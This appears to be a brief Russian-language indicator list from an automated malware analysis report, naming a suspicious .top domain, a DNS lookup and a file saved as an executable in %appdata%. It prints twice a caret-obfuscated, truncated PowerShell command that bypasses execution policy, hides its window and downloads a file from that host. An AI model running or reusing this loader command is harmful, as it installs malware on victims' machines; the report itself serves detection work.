Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^w^erShelL.eXE -e^xEC^UtIo^Np^oL^IcY ^By^P^Ass -N^O^prO^f^IlE^ -WinD^oWSTyL^E h^i^d^Den^ (^n^Ew-obje^ct SYs^TE^M.n^Et.WEbcLIEn^t).DOwN^l^oA^dFI^LE('http://www.doorasope.top...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "pO^w^erShelL.eXE -e^xEC^UtIo^Np^oL^IcY ^By^P^Ass -N^O^prO^f^IlE^ -WinD^oWSTyL^E h^i^d^Den^ (^n^Ew-obje^ct SYs^TE^M.n^Et.WEbcLIEn^t).DOwN^l^oA^dFI^LE('http://www.doorasope.top...' (со скрытым окном)